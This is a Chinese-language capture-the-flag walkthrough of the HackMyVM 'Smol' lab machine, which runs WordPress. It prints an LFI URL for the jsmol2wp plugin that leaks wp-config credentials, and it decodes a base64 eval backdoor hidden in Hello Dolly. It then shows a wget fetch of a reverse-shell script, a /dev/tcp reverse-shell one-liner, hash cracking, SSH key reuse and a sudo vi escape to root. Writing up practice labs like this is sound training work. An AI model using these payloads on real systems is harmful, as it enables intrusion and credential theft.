HackMyVm Smol Walkthrough

发表评论

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Smol

直接使用IP地址访问出错,地址栏显示www.smol.hmv,把这个地址加入/etc/hosts。扫描端口:

└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-24 16:03 CST
Nmap scan report for www.smol.hmv (192.168.56.130)
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 6.3
|_http-title: AnotherCTF
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:BF:B5:36 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问80端口后,可以发现是一个wordpress网站。使用wpscan扫描,发现一个有趣的插件,插件的名称和靶机的名称接近,同时还发现了几个用户。

└─$ wpscan --url http://www.smol.hmv -e u,p
...
[i] Plugin(s) Identified:

[+] jsmol2wp
 | Location: http://www.smol.hmv/wp-content/plugins/jsmol2wp/
 | Latest Version: 1.07 (up to date)
 | Last Updated: 2018-03-09T10:28:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.07 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt

搜索这个插件,发现有LFI漏洞。访问http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php,可以得到一个用户名和密码。

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

通过http://www.smol.hmv/wp-admin登录后,浏览http://www.smol.hmv/index.php/to-do/,可以得到如下信息,其中,第一条信息是一个提示:hello-dolly插件中可能有后门。

1- [IMPORTANT] Check Backdoors: Verify the SOURCE CODE of “Hello Dolly” plugin as the site’s code revision.

2- Set Up HTTPS: Configure an SSL certificate to enable HTTPS and encrypt data transmission.

3- Update Software: Regularly update your CMS, plugins, and themes to patch vulnerabilities.

...

继续利用刚才的LFI漏洞,访问hello-dolly插件的源代码,地址为http://www.smol.hmv/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php,并在其中发现如下代码:

// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
    eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));

    $chosen = hello_dolly_get_lyric();
    $lang   = '';
    if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
        $lang = ' lang="en"';
    }

    printf(
        '<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
        __( 'Quote from Hello Dolly song, by Jerry Herman:' ),
        $lang,
        $chosen
    );
}

解码这一段base64代码,得到如下源码:

└─$ echo CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA= |base64 -d

 if (isset($_GET["\143\155\x64"])) { system($_GET["\143\x6d\144"]); }

中间的\143\155\x64\143\x6d\144都是字符串"cmd"的编码。访问这个php文件,并代入cmd参数,即可执行系统命令。我们在本机写好一个bash后门,并运行服务器。

└─$ cat rev.sh      
/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.101/1234 0>&1'
└─$ sudo python -m http.server 80 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

靶机访问下面的地址,将rev.sh下载并保存为/tmp/rev.sh。

http://www.smol.hmv/wp-admin/index.php?cmd=wget http://192.168.56.101/rev.sh -O /tmp/rev.sh

然后本地监听1234端口,靶机再运行刚刚上传的rev.sh,得到shell。

http://www.smol.hmv/wp-admin/index.php?cmd=bash /tmp/rev.sh

此时为www-data用户。

└─$ nc -nlvp 1234                    
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.130] 45582
bash: cannot set terminal process group (825): Inappropriate ioctl for device
bash: no job control in this shell
www-data@smol:/var/www/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

接着以wpuser用户登录mysql,从中得到所有用户的密码hash。

mysql> select * from wp_users;
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
| ID | user_login | user_pass                          | user_nicename | user_email         | user_url            | user_registered     | user_activation_key | user_status | display_name           |
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+
|  1 | admin      | $P$B5Te3OJvzvJ7NjDDeHZcOKqsQACvOJ0 | admin         | admin@smol.thm     | http://www.smol.hmv | 2023-08-16 06:58:30 |                     |           0 | admin                  |
|  2 | wpuser     | $P$BfZjtJpXL9gBwzNjLMTnTvBVh2Z1/E. | wp            | wp@smol.thm        | http://smol.thm     | 2023-08-16 11:04:07 |                     |           0 | wordpress user         |
|  3 | think      | $P$B0jO/cdGOCZhlAJfPSqV2gVi2pb7Vd/ | think         | josemlwdf@smol.thm | http://smol.thm     | 2023-08-16 15:01:02 |                     |           0 | Jose Mario Llado Marti |
|  4 | gege       | $P$BsIY1w5krnhP3WvURMts0/M4FwiG0m1 | gege          | gege@smol.thm      | http://smol.thm     | 2023-08-17 20:18:50 |                     |           0 | gege                   |
|  5 | diego      | $P$BWFBcbXdzGrsjnbc54Dr3Erff4JPwv1 | diego         | diego@smol.thm     | http://smol.thm     | 2023-08-17 20:19:15 |                     |           0 | diego                  |
|  6 | xavi       | $P$BvcalhsCfVILp2SgttADny40mqJZCN/ | xavi          | xavi@smol.thm      | http://smol.thm     | 2023-08-17 20:20:01 |                     |           0 | xavi                   |
+----+------------+------------------------------------+---------------+--------------------+---------------------+---------------------+---------------------+-------------+------------------------+

破解可得到diego的密码。切换为该用户。

└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.130] 36626
bash: cannot set terminal process group (825): Inappropriate ioctl for device
bash: no job control in this shell
www-data@smol:/var/www/wordpress/wp-admin$ su diego
su diego
Password: sandiegocalifornia
id
uid=1002(diego) gid=1002(diego) groups=1002(diego),1005(internal)

浏览发现diego用户可以访问think用户的id_rsa。

diego@smol:~$ cd /home
cd /home
diego@smol:/home$ cd think
cd think
diego@smol:/home/think$ cd .ssh
cd .ssh
diego@smol:/home/think/.ssh$ ls -la
ls -la
total 20
drwxr-xr-x 2 think think    4096 Jun 21  2023 .
drwxr-x--- 5 think internal 4096 Oct 24 21:41 ..
-rwxr-xr-x 1 think think     572 Jun 21  2023 authorized_keys
-rwxr-xr-x 1 think think    2602 Jun 21  2023 id_rsa
-rwxr-xr-x 1 think think     572 Jun 21  2023 id_rsa.pub

将id_rsa下载到本地,现在可以以think用户身份访问ssh服务了。

└─$ ssh think@192.168.56.130 -i id_rsa
...
think@smol:~$ id
uid=1000(think) gid=1000(think) groups=1000(think),1004(dev),1005(internal)

继续以think用户身份浏览,发现gege目录下有个wordpress.old.zip文件,但无法访问。

think@smol:~$ cd /home/gege
think@smol:/home/gege$ ls -la
total 31536
drwxr-x--- 3 gege internal     4096 Oct 24 21:42 .
drwxr-xr-x 6 root root         4096 Aug 16  2023 ..
lrwxrwxrwx 1 root root            9 Aug 18  2023 .bash_history -> /dev/null
-rw-r--r-- 1 gege gege          220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 gege gege         3771 Feb 25  2020 .bashrc
-rw-r--r-- 1 gege gege          807 Feb 25  2020 .profile
lrwxrwxrwx 1 root root            9 Aug 18  2023 .viminfo -> /dev/null
drwxr-x--- 2 gege gege         4096 Oct 24 21:42 wordpress.old
-rwxr-x--- 1 root gege     32266546 Aug 16  2023 wordpress.old.zip
think@smol:/home/gege$ file wordpress.old.zip 
wordpress.old.zip: regular file, no read permission

查看/etc/group,发现think和gege同属一组,尝试用su命令切换用户。

think@smol:/home/gege$ cat /etc/group                                                                                                                                         
root:x:0:  
...
xavi:x:1001:
diego:x:1002:
gege:x:1003:
dev:x:1004:think,gege
internal:x:1005:diego,gege,think,xavi
think@smol:/home/gege$ su - gege
gege@smol:~$ id
uid=1003(gege) gid=1003(gege) groups=1003(gege),1004(dev),1005(internal)

现在可以访问wordpress.old.zip文件了,下载到本机并解压,需要输入密码,首先进行解密。

─$ zip2john wordpress.old.zip > zip_hash.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt

成功解压后,访问wp-config.php,可以得到xavi的密码。从gege切换为xavi后,尝试sudo。

xavi@smol:~$ sudo -l
[sudo] password for xavi: 
Matching Defaults entries for xavi on smol:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User xavi may run the following commands on smol:
    (ALL : ALL) /usr/bin/vi /etc/passwd

照提示运行sudo /usr/bin/vi /etc/passwd,按进入命令行,然后运行!bash,得到root的shell。

root@smol:/home/xavi$ id
uid=0(root) gid=0(root) groups=0(root)
root@smol:/home/xavi$
Post Views: 2,105

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注